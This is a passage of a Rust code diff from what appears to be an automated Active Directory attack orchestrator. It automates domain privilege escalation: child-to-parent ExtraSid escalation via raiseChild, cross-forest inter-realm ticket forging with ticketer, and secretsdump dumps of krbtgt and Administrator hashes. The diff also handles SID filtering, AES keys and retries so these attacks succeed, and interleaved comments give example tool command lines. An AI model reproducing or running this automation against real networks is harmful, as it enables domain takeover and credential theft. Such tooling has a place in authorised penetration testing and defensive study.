= %parent_domain, + sid = %sid, + "Resolved parent domain SID via lookupsid for child-to-parent ExtraSid" + ); + let op_id = { dispatcher.state.read().await.operation_id.clone() }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + let _ = reader.set_domain_sid(&mut conn, &parent_lower, &sid).await; + if let Some(ref name) = admin_name { + let _ = reader.set_admin_name(&mut conn, &parent_lower, name).await; + } + { + let mut state = 
dispatcher.state.write().await; + state.domain_sids.insert(parent_lower.clone(), sid.clone()); + if let Some(ref name) = admin_name { + state.admin_names.insert(parent_lower.clone(), name.clone()); + } + } + payload["target_sid"] = json!(sid); + have_target_sid = true; + } else { + warn!( child_domain = %child_domain, parent_domain = %parent_domain, - auth = auth_method, - "Child-to-parent escalation dispatched" + parent_dc_ip = %parent_dc_ip, + "Could not resolve parent SID — deferring child-to-parent dispatch" ); - let _ = dispatcher - .state - .mark_exploited(&dispatcher.queue, &vuln_id) - .await; - dispatcher - .state - .write() - .await - .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); - let _ = dispatcher - .state - .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) - .await; - } - Ok(None) => { - debug!("Child-to-parent deferred by throttler"); } - Err(e) => { - warn!(err = %e, "Failed to dispatch child-to-parent escalation") + } + if !have_target_sid { + continue; + } + + // Resolve child domain SID if not cached (needed for ExtraSid golden ticket) + if !have_source_sid { + if let Some(ref child_dc) = child_dc_ip { + if let Some((sid, admin_name)) = + super::golden_ticket::resolve_domain_sid( + &child_domain, + child_dc, + child_admin_cred.as_ref(), + child_admin_hash.as_ref(), + ) + .await + { + info!( + child_domain = %child_domain, + sid = %sid, + "Resolved child domain SID via lookupsid for child-to-parent ExtraSid" + ); + let op_id = { dispatcher.state.read().await.operation_id.clone() }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + let _ = reader.set_domain_sid(&mut conn, &cd_lower, &sid).await; + if let Some(ref name) = admin_name { + let _ = reader.set_admin_name(&mut conn, &cd_lower, name).await; + } + { + let mut state = dispatcher.state.write().await; + state.domain_sids.insert(cd_lower.clone(), sid.clone()); + if let Some(ref name) = admin_name { + state.admin_names.insert(cd_lower.clone(), name.clone()); + } + } + payload["source_sid"] = json!(sid); + have_source_sid = true; + } else { + warn!( + child_domain = %child_domain, + child_dc_ip = %child_dc, + "Could not resolve child SID — deferring child-to-parent dispatch" + ); + } + } else { + warn!( + child_domain = %child_domain, + "No child DC IP available — deferring child-to-parent dispatch" + ); } } + if !have_source_sid { + continue; + } + + // Use raiseChild.py (impacket's canonical child→parent ExtraSid + // automation) via DIRECT tool dispatch (no LLM in the loop). + // This replaces the previous golden_ticket + secretsdump_kerberos + // combo, which fails because impacket's cross-realm referral is + // broken (fortra/impacket#315): a child-realm ticket presented + // to the parent KDC returns KDC_ERR_WRONG_REALM / + // KDC_ERR_PREAUTH_FAILED. raiseChild forges the inter-realm + // chain internally and dumps parent krbtgt + Administrator in + // one shot. + // + // Direct dispatch_tool bypasses the LLM agent loop entirely — + // the orchestrator owns every input (child admin hash, child + // DC IP, parent DC IP), so there is no value in laundering them + // through an LLM that might typo or omit args. 
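// [Hedged, illustrative — not part of the patch.] The manual equivalent
// of the dispatch below, assuming stock impacket tooling on the worker,
// is roughly:
//
//   raiseChild.py -hashes :<child_admin_ntlm> child.contoso.local/Administrator
//
// raiseChild discovers the parent via the child DC's trustedDomain
// objects, forges the inter-realm ExtraSid chain, and dumps the parent
// krbtgt + Administrator in one run (exact flag spelling may vary by
// impacket version).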
+ let admin_hash_value = child_admin_hash.as_ref().map(|h| h.hash_value.clone()); + let admin_password = child_admin_cred + .as_ref() + .map(|c| c.password.clone()) + .filter(|p| !p.is_empty()); + if admin_hash_value.is_none() && admin_password.is_none() { + warn!( + child_domain = %child_domain, + parent_domain = %parent_domain, + "No child Administrator hash or password — deferring child-to-parent (raise_child needs auth)" + ); + continue; + } + + // raiseChild auto-discovers parent forest root via the + // child DC's trustedDomain LDAP objects and resolves DC IPs + // via DNS — script-level flags for IP/domain are unsupported + // (argparse exit 2). However, on workers without forest DNS, + // the bare domain FQDN (`child.contoso.local`) won't + // resolve — so pass the IPs so the tool wrapper can + // pre-seed `/etc/hosts` before invoking impacket. + let mut raise_args = json!({ + "child_domain": child_domain.clone(), + "username": "Administrator", + }); + if let Some(h) = admin_hash_value { + raise_args["hash"] = json!(h); + } else if let Some(p) = admin_password { + raise_args["password"] = json!(p); + } + if let Some(ref ip) = child_dc_ip { + raise_args["child_dc_ip"] = json!(ip); + } + raise_args["parent_domain"] = json!(parent_domain.clone()); + if !parent_dc_ip.is_empty() { + raise_args["parent_dc_ip"] = json!(parent_dc_ip.clone()); + } + + let call = ToolCall { + id: format!("raise_child_{}", uuid::Uuid::new_v4().simple()), + name: "raise_child".to_string(), + arguments: raise_args, + }; + let task_id = format!( + "trust_raise_child_{}", + &uuid::Uuid::new_v4().simple().to_string()[..12] + ); + + // Mark dedup BEFORE spawning so the next 30s tick doesn't + // re-dispatch the same trust while raiseChild is running. + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) + .await; + + info!( + task_id = %task_id, + child_domain = %child_domain, + parent_domain = %parent_domain, + auth = auth_method, + "Dispatching raise_child (direct tool, no LLM)" + ); + + // Spawn so the trust loop continues processing other items + // while raiseChild runs (typically 30–120s). mark_exploited + // is gated on observed parent krbtgt — no premature marking. + let dispatcher_bg = dispatcher.clone(); + let parent_domain_bg = parent_domain.clone(); + let child_domain_bg = child_domain.clone(); + let vuln_id_bg = vuln_id.clone(); + tokio::spawn(async move { + let result = dispatcher_bg + .llm_runner + .tool_dispatcher() + .dispatch_tool("privesc", &task_id, &call) + .await; + match result { + Ok(exec_result) => { + if let Some(err) = exec_result.error.as_ref() { + let tail: String = exec_result + .output + .chars() + .rev() + .take(2000) + .collect::<String>() + .chars() + .rev() + .collect(); + warn!( + err = %err, + child_domain = %child_domain_bg, + parent_domain = %parent_domain_bg, + output_tail = %tail, + "raise_child returned error" + ); + return; + } + // Verify parent compromise — only mark exploited + // when we actually observe parent krbtgt. + // + // Inspect exec_result.discoveries directly: + // dispatch_tool returns BEFORE push_realtime_discoveries + // finishes pumping hashes into state.hashes, so reading + // state here is too early and produces a false negative.
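// [Illustrative example — not part of the patch.] The check below
// assumes `exec_result.discoveries` carries a shape roughly like:
//
//   { "hashes": [ { "username": "krbtgt",
//                   "domain": "contoso.local",
//                   "hash_type": "NTLM",
//                   "hash_value": "..." } ] }
//
// i.e. the same per-hash fields the predicate reads back out.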
+ let parent_lower = parent_domain_bg.to_lowercase(); + let has_parent_krbtgt = exec_result + .discoveries + .as_ref() + .and_then(|d| d.get("hashes")) + .and_then(|h| h.as_array()) + .map(|hashes| { + hashes.iter().any(|h| { + let user = h + .get("username") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let dom = h + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let htype = h + .get("hash_type") + .and_then(|v| v.as_str()) + .unwrap_or(""); + user.eq_ignore_ascii_case("krbtgt") + && dom.to_lowercase() == parent_lower + && htype.eq_ignore_ascii_case("ntlm") + }) + }) + .unwrap_or(false); + let tail_for_log: String = exec_result + .output + .chars() + .rev() + .take(2000) + .collect::<String>() + .chars() + .rev() + .collect(); + if has_parent_krbtgt { + info!( + parent_domain = %parent_domain_bg, + "raise_child compromised parent — marking exploited" + ); + let _ = dispatcher_bg + .state + .mark_exploited(&dispatcher_bg.queue, &vuln_id_bg) + .await; + let techniques = + vec!["T1134.005".to_string(), "T1003.006".to_string()]; + let event_id = format!( + "evt-raise-child-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "trust_automation", + "description": format!( + "Child-to-parent ExtraSid escalation: {} \u{2192} {} via raiseChild", + child_domain_bg, parent_domain_bg + ), + "mitre_techniques": techniques, + }); + let _ = dispatcher_bg + .state + .persist_timeline_event( + &dispatcher_bg.queue, + &event, + &techniques, + ) + .await; + } else { + warn!( + parent_domain = %parent_domain_bg, + output_tail = %tail_for_log, + "raise_child completed but no parent krbtgt observed — NOT marking exploited" + ); + } + } + Err(e) => { + warn!( + err = %e, + child_domain = %child_domain_bg, + parent_domain = %parent_domain_bg, + "raise_child dispatch errored" + ); + } + } + }); } } } @@ -557,11 +1227,10 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch: } // Follow trust keys (inter-realm ticket + foreign secretsdump) - let (work, admin_cred_phase3, admin_hash_phase3): ( - Vec<TrustFollowWork>, - Option<Credential>, - Option<Hash>, - ) = { + // + // The deterministic forge uses only the trust key + SIDs (already on + // each TrustFollowWork item); admin creds are no longer needed here
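// [Illustrative example — not part of the patch.] A phase-3 dedup key,
// per the format built below, looks like
//
//   trust_follow:contoso.local:fabrikam$
//
// (lowercased source domain, then the trust account's sAMAccountName).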
+ let work: Vec<TrustFollowWork> = { let state = dispatcher.state.read().await; // Skip if no domain admin yet — trust extraction requires DA-level creds @@ -578,29 +1247,6 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch: .map(|t| (t.flat_name.to_uppercase(), t)) .collect(); - let admin_cred = state - .credentials - .iter() - .find(|c| c.is_admin && !c.password.is_empty()) - .cloned(); - // Find admin hash from any dominated domain with a DC - let admin_hash = if admin_cred.is_none() { - state - .domain_controllers - .keys() - .filter(|d| state.dominated_domains.contains(&d.to_lowercase())) - .find_map(|dom| { - state.hashes.iter().find(|h| { - h.username.to_lowercase() == "administrator" - && h.domain.to_lowercase() == dom.to_lowercase() - && h.hash_type.to_uppercase() == "NTLM" - }) - }) - .cloned() - } else { - None - }; - let items = state .hashes .iter() @@ -609,9 +1255,7 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch: return None; } - // Only process hashes that match a known trust account let netbios = hash.username.trim_end_matches('$').to_uppercase(); - let trust = trust_by_flat.get(&netbios)?; // Resolve source domain — fall back to first dominated domain // with a DC when secretsdump output lacks domain prefix @@ -628,24 +1272,44 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch: if source_domain.is_empty() { return None; } + let source_lower = source_domain.to_lowercase(); + + // Resolve target FQDN: prefer explicit TrustInfo from LDAP + // enumeration, else derive from known domains where the + // NetBIOS label matches and the FQDN is not the source + // (filters out same-domain machine accounts). + let target_domain = if let Some(t) = trust_by_flat.get(&netbios) { + t.domain.clone() + } else { + state + .domain_controllers + .keys() + .chain(state.dominated_domains.iter()) + .find(|d| { + let dl = d.to_lowercase(); + dl != source_lower + && d.split('.') + .next() + .map(|label| label.to_uppercase() == netbios) + .unwrap_or(false) + }) + .cloned()? + }; let dedup_key = format!( "trust_follow:{}:{}", - source_domain.to_lowercase(), + source_lower, hash.username.to_lowercase() ); if state.is_processed(DEDUP_TRUST_FOLLOW, &dedup_key) { return None; } - // Use the FQDN from the trust relationship — never fall back - // to bare NetBIOS name which produces invalid domain strings. - let target_domain = trust.domain.clone(); - - let target_dc_ip = state - .domain_controllers - .get(&target_domain.to_lowercase()) - .cloned(); + // Use resolve_dc_ip so we fall back to the hosts table when + // domain_controllers lacks an explicit entry for the foreign + // domain — common for cross-forest trusts where the foreign + // DC is only known via host scan, not LDAP enumeration.
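// [Hedged sketch — not part of the patch; `resolve_dc_ip` lives in the
// state module and is not shown in this diff.] Per the comments here,
// its assumed behavior is: explicit `domain_controllers` entry first,
// then any DC-looking host in the hosts table for that domain, e.g.:
//
//   fn resolve_dc_ip(&self, domain: &str) -> Option<String> {
//       let d = domain.to_lowercase();
//       if let Some(ip) = self.domain_controllers.get(&d) {
//           return Some(ip.clone());
//       }
//       let suffix = format!(".{d}");
//       self.hosts
//           .iter()
//           .find(|h| {
//               (h.is_dc || h.detect_dc())
//                   && !h.ip.is_empty()
//                   && h.hostname.to_lowercase().ends_with(&suffix)
//           })
//           .map(|h| h.ip.clone())
//   }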
+ let target_dc_ip = state.resolve_dc_ip(&target_domain); let source_domain_sid = state .domain_sids @@ -656,11 +1320,6 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch: .get(&target_domain.to_lowercase()) .cloned(); - let source_dc_ip = state - .domain_controllers - .get(&source_domain.to_lowercase()) - .cloned(); - Some(TrustFollowWork { dedup_key, hash: hash.clone(), @@ -669,20 +1328,34 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch: target_dc_ip, source_domain_sid, target_domain_sid, - source_dc_ip, }) }) .collect(); - (items, admin_cred, admin_hash) + items }; for item in work { let vuln_id = forest_trust_vuln_id(&item.source_domain, &item.target_domain); - let trust_target = item - .target_dc_ip - .clone() - .unwrap_or_else(|| item.target_domain.clone()); + + // Defer dispatch when the target DC IP is unknown: impacket needs + // a routable -target-ip for both create_inter_realm_ticket and the + // forge-and-present secretsdump fallback. Passing the bare domain + // string fails fast and burns the dedup key. Re-tick in 30s and + // let host scans / trust enum populate the DC entry first. + let target_dc_ip = match item.target_dc_ip.clone() { + Some(ip) => ip, + None => { + debug!( + source = %item.source_domain, + target = %item.target_domain, + trust_account = %item.hash.username, + "Deferring forest trust escalation — target DC IP unresolved" + ); + continue; + } + }; + let trust_target = target_dc_ip.clone(); { let mut details = std::collections::HashMap::new(); details.insert( @@ -720,77 +1393,417 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch: .await; } - // 1. Dispatch inter-realm ticket creation. - // Use field names that match the tool and prompt expectations: - // - `vuln_type` routes to generate_trust_key_prompt - // - `source_sid`/`target_sid` match create_inter_realm_ticket tool - // - `trusted_domain` is read by the trust prompt - // - Include admin creds + dc_ip so the LLM can call get_sid if SIDs are missing - let mut ticket_payload = json!({ - "technique": "create_inter_realm_ticket", - "vuln_type": "cross_forest", - "domain": item.source_domain, - "trusted_domain": item.target_domain, - "target_domain": item.target_domain, - "target": item.target_dc_ip.as_deref().unwrap_or(&item.target_domain), - "trust_key": item.hash.hash_value, - "trust_account": item.hash.username, - "vuln_id": &vuln_id, - }); - if let Some(ref sid) = item.source_domain_sid { - ticket_payload["source_sid"] = json!(sid); - } - if let Some(ref sid) = item.target_domain_sid { - ticket_payload["target_sid"] = json!(sid); - } - if let Some(ref aes) = item.hash.aes_key { - ticket_payload["aes_key"] = json!(aes); - } - if let Some(ref dc_ip) = item.source_dc_ip { - ticket_payload["dc_ip"] = json!(dc_ip); - } - if let Some(ref cred) = admin_cred_phase3 { - ticket_payload["username"] = json!(cred.username); - ticket_payload["password"] = json!(cred.password); - } else if let Some(ref hash) = admin_hash_phase3 { - ticket_payload["username"] = json!(hash.username); - ticket_payload["admin_hash"] = json!(hash.hash_value); + // Skip self-referential trust (source == target) + if item.source_domain.to_lowercase() == item.target_domain.to_lowercase() { + debug!( + source = %item.source_domain, + target = %item.target_domain, + "Skipping self-referential trust escalation" + ); + continue; } - match dispatcher - .throttled_submit("exploit", "privesc", ticket_payload, 1) - .await + // Suppress the ExtraSid forge when the trust has SID filtering
+ // active. ticketer adds Enterprise Admins (RID 519) via + // `--extra-sid` to satisfy DCSync — but a SID-filtered forest + // trust strips RID<1000 SIDs from the cross-realm PAC, and the + // target KDC returns rpc_s_access_denied. Burn the dedup so this + // doomed dispatch can't loop (the vuln is deliberately NOT marked + // exploited — nothing was compromised), and wake the cross-forest + // fallback paths (ACL/MSSQL/FSP) to take over. { + let state = dispatcher.state.read().await; + if is_filtered_inter_forest_trust(&state, &item.source_domain, &item.target_domain) + { + info!( + source = %item.source_domain, + target = %item.target_domain, + trust_account = %item.hash.username, + "Suppressing forge_inter_realm_and_dump — SID filtering on cross-forest trust would reject ExtraSid; waking fallbacks" + ); + drop(state); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_TRUST_FOLLOW, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &item.dedup_key) + .await; + wake_cross_forest_fallbacks(&dispatcher, &item.target_domain).await; + + // Dispatch `create_inter_realm_ticket` so downstream Kerberos-capable + // tools (e.g. bloodyad with -k) have a valid ccache for the target + // forest. SID filtering blocks ExtraSid-based DCSync, but the forged + // TGT still allows Kerberos LDAP bind as Administrator. The tool writes + // Administrator.ccache in a tempdir; we persist the full path to Redis + // via `publish_kerberos_ticket` so the credential resolver can find it. + { + let dispatcher_bg = dispatcher.clone(); + let source_domain_bg = item.source_domain.clone(); + let target_domain_bg = item.target_domain.clone(); + let trust_key_bg = item.hash.hash_value.clone(); + let aes_key_bg = item.hash.aes_key.clone(); + let source_domain_sid_bg = { + let s = dispatcher.state.read().await; + s.domain_sids + .get(&item.source_domain.to_lowercase()) + .cloned() + }; + tokio::spawn(async move { + dispatch_create_inter_realm_ticket( + &dispatcher_bg, + &source_domain_bg, + &target_domain_bg, + &trust_key_bg, + aes_key_bg.as_deref(), + source_domain_sid_bg.as_deref(), + ) + .await; + }); + } continue; + } + } + + // Forge-and-present the inter-realm TGT as a deterministic worker + // task — NOT an LLM task. Both `create_inter_realm_ticket` and + // `secretsdump_kerberos` run sequentially on the same worker via + // `expand_technique_task`, so the ccache file produced by ticketer + // is on the same filesystem when secretsdump reads it. + // + // Routing through the LLM here would launder deterministic values + // (NT hash, AES key, SIDs) through token generation — the LLM + // would have to copy them out of the rendered prompt into tool + // call args, where they get dropped, typo'd, or omitted. The + // orchestrator already owns every input; deliver them directly. + // + // Resolve the target DC hostname so Kerberos auth can match the + // SPN baked into the ticket. Falls back to the IP, which works + // when the worker can reverse-resolve via DNS.
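// [Hedged, illustrative — not part of the patch.] Per the comments here,
// the combined worker tool is roughly equivalent to running:
//
//   ticketer.py -nthash <trust_key> -aesKey <aes256_key> \
//       -domain-sid <source_sid> -domain contoso.local \
//       -spn krbtgt/FABRIKAM.LOCAL Administrator
//   KRB5CCNAME=Administrator.ccache secretsdump.py -k -no-pass \
//       FABRIKAM.LOCAL/Administrator@<dc_fqdn> -dc-ip <target_dc_ip>
//
// in one shared working directory (impacket flag spellings may vary by
// version); the FQDN matters because the SPN in the presented ticket
// must match the host being contacted.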
+ let target_dc_hostname = { + let s = dispatcher.state.read().await; + s.hosts + .iter() + .find(|h| h.ip == target_dc_ip && !h.hostname.is_empty()) + .map(|h| h.hostname.clone()) + .or_else(|| { + s.hosts + .iter() + .find(|h| { + (h.is_dc || h.detect_dc()) + && h.hostname.to_lowercase().ends_with(&format!( + ".{}", + item.target_domain.to_lowercase() + )) + }) + .map(|h| h.hostname.clone()) + }) + .unwrap_or_else(|| target_dc_ip.clone()) + }; + + // ticketer writes .ccache in the worker cwd; the + // following secretsdump_kerberos call reads it via KRB5CCNAME. + let ticket_username = "Administrator"; + let ticket_path = format!("{ticket_username}.ccache"); + + // Resolve missing source SID via lookupsid against the source + // DC. ticketer.py needs `--domain-sid` for the source realm to + // build a valid PAC; without it the resulting ticket gets + // rejected by the target KDC. We have DA on the source domain + // (cross-forest forge only fires after DA), so SAMR lookupsid + // works with either a password cred or admin NTLM hash. + let source_domain_sid = if item.source_domain_sid.is_some() { + item.source_domain_sid.clone() + } else { + let (source_dc_ip, src_cred, src_hash) = { + let s = dispatcher.state.read().await; + let src_lower = item.source_domain.to_lowercase(); + let dc = s.resolve_dc_ip(&item.source_domain); + let cred = s + .credentials + .iter() + .find(|c| { + c.is_admin + && !c.password.is_empty() + && c.domain.to_lowercase() == src_lower + }) + .cloned(); + let h = s + .hashes + .iter() + .find(|h| { + h.username.to_lowercase() == "administrator" + && h.domain.to_lowercase() == src_lower + && h.hash_type.to_uppercase() == "NTLM" + }) + .cloned(); + (dc, cred, h) + }; + let resolved = if let Some(ref dc_ip) = source_dc_ip { + super::golden_ticket::resolve_domain_sid( + &item.source_domain, + dc_ip, + src_cred.as_ref(), + src_hash.as_ref(), + ) + .await + } else { + None + }; + if let Some((sid, admin_name)) = resolved { + info!( + source_domain = %item.source_domain, + sid = %sid, + "Resolved source domain SID for cross-forest forge" + ); + let op_id = { dispatcher.state.read().await.operation_id.clone() }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + let src_lower = item.source_domain.to_lowercase(); + let _ = reader.set_domain_sid(&mut conn, &src_lower, &sid).await; + if let Some(ref name) = admin_name { + let _ = reader.set_admin_name(&mut conn, &src_lower, name).await; + } + { + let mut state = dispatcher.state.write().await; + state.domain_sids.insert(src_lower.clone(), sid.clone()); + if let Some(ref name) = admin_name { + state.admin_names.insert(src_lower, name.clone()); + } + } + Some(sid) + } else { + warn!( + source = %item.source_domain, + target = %item.target_domain, + "Could not resolve source SID — deferring cross-forest forge" + ); + None } + }; + if source_domain_sid.is_none() { + continue; } - // The privesc agent handles the full flow: forge inter-realm ticket → - // secretsdump_kerberos against the target DC. No separate credential_access - // dispatch needed (it lacked valid auth and always failed). + // For child→parent forges we MUST inject the parent's Enterprise + // Admins SID (RID 519) as ExtraSid; without it the parent KDC + // issues a TGS but DRSUAPI on the parent DC rejects the + // replication call as `rpc_s_access_denied` and nxc dumps zero + // hashes (exit 0, hiding the failure). 
+ // + // For cross-forest forges, the target domain SID is required for + // ticketer.py to build a PAC the target KDC will accept (without + // it the inter-realm TGT is rejected and forge_inter_realm_and_dump + // returns 0 hashes, locking dedup permanently). Resolve the target + // SID on-demand via lookupsid against the target DC using source + // admin creds (cross-trust SAMR works post-DA) when it isn't + // cached. Defer dispatch (no dedup mark) when resolution fails so + // the next 30s tick can retry once sid_enumeration populates it + // via lsaquery. + let source_l = item.source_domain.to_lowercase(); + let target_l = item.target_domain.to_lowercase(); + let is_child_to_parent = + source_l != target_l && source_l.ends_with(&format!(".{target_l}")); + let needs_target_sid = source_l != target_l; + let target_domain_sid: Option<String> = + if !needs_target_sid || item.target_domain_sid.is_some() { + item.target_domain_sid.clone() + } else { + let (src_cred, src_hash) = { + let s = dispatcher.state.read().await; + let src_lower = item.source_domain.to_lowercase(); + let cred = s + .credentials + .iter() + .find(|c| { + c.is_admin + && !c.password.is_empty() + && c.domain.to_lowercase() == src_lower + }) + .cloned(); + let h = s + .hashes + .iter() + .find(|h| { + h.username.to_lowercase() == "administrator" + && h.domain.to_lowercase() == src_lower + && h.hash_type.to_uppercase() == "NTLM" + }) + .cloned(); + (cred, h) + }; + let resolved = super::golden_ticket::resolve_domain_sid( + &item.target_domain, + &target_dc_ip, + src_cred.as_ref(), + src_hash.as_ref(), + ) + .await; + if let Some((sid, admin_name)) = resolved { + let label = if is_child_to_parent { + "Resolved parent domain SID for child→parent forge ExtraSid" + } else { + "Resolved target domain SID for cross-forest forge" + }; + info!( + target_domain = %item.target_domain, + sid = %sid, + "{}", label + ); + let op_id = { dispatcher.state.read().await.operation_id.clone() }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + let tgt_lower = item.target_domain.to_lowercase(); + let _ = reader.set_domain_sid(&mut conn, &tgt_lower, &sid).await; + if let Some(ref name) = admin_name { + let _ = reader.set_admin_name(&mut conn, &tgt_lower, name).await; + } + { + let mut state = dispatcher.state.write().await; + state.domain_sids.insert(tgt_lower.clone(), sid.clone()); + if let Some(ref name) = admin_name { + state.admin_names.insert(tgt_lower, name.clone()); + } + } + Some(sid) + } else { + let label = if is_child_to_parent { + "Could not resolve parent SID — deferring child→parent forge" + } else { + "Could not resolve target SID — deferring cross-forest forge" + }; + warn!( + source = %item.source_domain, + target = %item.target_domain, + target_dc_ip = %target_dc_ip, + "{}", label + ); + None + } + }; + if needs_target_sid && target_domain_sid.is_none() { + continue; + } - // Wait for AES256 to upsert before dispatching cross-forest forge. + // secretsdump runs twice (NTLM-only first, then -aes-types) and the + // second call typically lands ~60-90s after NTLM. If we dispatch + // before AES arrives, Win2016+ targets reject the RC4-only ticket + // with KDC_ERR_TGT_REVOKED and forge_inter_realm yields zero hashes + // — locking dedup on a doomed dispatch. + // + // Re-read state.hashes for an AES-equipped variant of this trust + // account; if present, use it. If absent, defer up to ~3 min so the + // second secretsdump can land.
After that, dispatch with NTLM-only + // as a last resort (some target DCs accept RC4 still, and the + // wake_cross_forest_fallbacks path is the real safety net). + let resolved_aes_key: Option<String> = if needs_target_sid { + let from_state = { + let s = dispatcher.state.read().await; + s.hashes + .iter() + .find(|h| { + h.username.eq_ignore_ascii_case(&item.hash.username) + && h.domain.eq_ignore_ascii_case(&item.hash.domain) + && h.aes_key.is_some() + }) + .and_then(|h| h.aes_key.clone()) + }; + let aes = item.hash.aes_key.clone().or(from_state); + if aes.is_none() { + let attempts = { + let mut state = dispatcher.state.write().await; + let count = state + .forge_aes_defers + .entry(item.dedup_key.clone()) + .or_insert(0); + *count += 1; + *count + }; + const MAX_AES_DEFERS: u32 = 6; + if attempts <= MAX_AES_DEFERS { + debug!( + source = %item.source_domain, + target = %item.target_domain, + trust_account = %item.hash.username, + attempts, + "Deferring cross-forest forge — AES256 not yet upserted on trust hash" + ); + continue; + } + warn!( + source = %item.source_domain, + target = %item.target_domain, + trust_account = %item.hash.username, + "Dispatching cross-forest forge with NTLM-only after AES wait exhausted" + ); + None + } else { + aes + } + } else { + item.hash.aes_key.clone() + }; + + // Build args for the combined `forge_inter_realm_and_dump` tool. + // This single tool runs impacket-ticketer + impacket-secretsdump + // sequentially in one worker invocation (shared tempdir as cwd), + // so the .ccache produced by ticketer is on the same filesystem + // when secretsdump reads it. Two split dispatch_tool calls would + // land on different worker pods with no shared FS. + let mut tool_args = json!({ + "source_domain": &item.source_domain, + "target_domain": &item.target_domain, + "trust_key": &item.hash.hash_value, + "username": ticket_username, + // `target` is the DC hostname (or IP fallback) for the SPN + // baked into the ticket; `dc_ip` is the routable IP used + // for impacket-secretsdump's `-dc-ip`. + "target": &target_dc_hostname, + "dc_ip": &target_dc_ip, + }); + if let Some(ref sid) = source_domain_sid { + tool_args["source_sid"] = json!(sid); + } + if let Some(ref sid) = target_domain_sid { + tool_args["target_sid"] = json!(sid); + } + // AES256 trust key — required for Win2016+ target DCs which + // reject RC4-only inter-realm tickets with KDC_ERR_TGT_REVOKED. + // resolved_aes_key prefers item.hash.aes_key, then re-reads + // state.hashes for an AES-equipped variant (handles the race + // where secretsdump's second pass upserts AES after work was + // collected). + if let Some(ref aes) = resolved_aes_key { + tool_args["aes_key"] = json!(aes); + } + // For child→parent trusts (intra-forest), inject parent's + // Enterprise Admins SID (RID 519). SID filtering blocks + // ExtraSID across forest trusts, so only emit on intra-forest. + // The defer above guarantees target_domain_sid is Some here + // when is_child_to_parent.
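// [Illustrative example — not part of the patch.] Given a parent SID of
// S-1-5-21-1004336348-1177238915-682003330, the line below injects
//
//   extra_sid = "S-1-5-21-1004336348-1177238915-682003330-519"
//
// i.e. the parent's Enterprise Admins group (well-known RID 519).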
+ if is_child_to_parent { + if let Some(ref tsid) = target_domain_sid { + tool_args["extra_sid"] = json!(format!("{tsid}-519")); + } + } + let _ = ticket_path; // ccache path is internal to the tool + let _ = trust_target; + + let call = ToolCall { + id: format!("forge_inter_realm_{}", uuid::Uuid::new_v4().simple()), + name: "forge_inter_realm_and_dump".to_string(), + arguments: tool_args, + }; + let task_id = format!( + "trust_forge_{}", + &uuid::Uuid::new_v4().simple().to_string()[..12] + ); + + // Mark dedup BEFORE spawning so the next 30s tick doesn't + // re-dispatch the same trust while the forge is running. dispatcher .state .write() @@ -800,6 +1813,211 @@ pub async fn auto_trust_follow(dispatcher: Arc<Dispatcher>, mut shutdown: watch: .state .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &item.dedup_key) .await; + + info!( + task_id = %task_id, + trust_account = %item.hash.username, + source_domain = %item.source_domain, + target_domain = %item.target_domain, + has_source_sid = source_domain_sid.is_some(), + has_target_sid = target_domain_sid.is_some(), + has_aes = resolved_aes_key.is_some(), + "Cross-forest forge dispatched (direct tool, no LLM)" + ); + + let dispatcher_bg = dispatcher.clone(); + let source_domain_bg = item.source_domain.clone(); + let target_domain_bg = item.target_domain.clone(); + let trust_account_bg = item.hash.username.clone(); + let vuln_id_bg = vuln_id.clone(); + let dedup_key_bg = item.dedup_key.clone(); + let trust_key_bg = item.hash.hash_value.clone(); + let aes_key_bg = resolved_aes_key.clone(); + let source_domain_sid_bg = source_domain_sid.clone(); + tokio::spawn(async move { + let result = dispatcher_bg + .llm_runner + .tool_dispatcher() + .dispatch_tool("privesc", &task_id, &call) + .await; + // Clear dedup on failure so the next 30s tick can retry once + // a fresh trust key, AES key, or SID becomes available. + let clear_dedup = || async { + dispatcher_bg + .state + .write() + .await + .unmark_processed(DEDUP_TRUST_FOLLOW, &dedup_key_bg); + let _ = dispatcher_bg + .state + .unpersist_dedup(&dispatcher_bg.queue, DEDUP_TRUST_FOLLOW, &dedup_key_bg) + .await; + }; + match result { + Ok(exec_result) => { + if let Some(err) = exec_result.error.as_ref() { + let tail: String = exec_result + .output + .chars() + .rev() + .take(2000) + .collect::<String>() + .chars() + .rev() + .collect(); + warn!( + err = %err, + source_domain = %source_domain_bg, + target_domain = %target_domain_bg, + trust_account = %trust_account_bg, + output_tail = %tail, + "forge_inter_realm_and_dump returned error — clearing dedup for retry" + ); + clear_dedup().await; + return; + } + // Verify target compromise — only mark exploited + // when we actually observe the target krbtgt hash + // in the dispatch_tool discoveries.
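// [Editorial sketch — not part of the patch.] The krbtgt-observation
// predicate below also appears in the raise_child callback above; a
// shared helper could consolidate both, e.g.:
//
//   fn discoveries_contain_krbtgt(discoveries: Option<&serde_json::Value>, domain: &str) -> bool {
//       let target = domain.to_lowercase();
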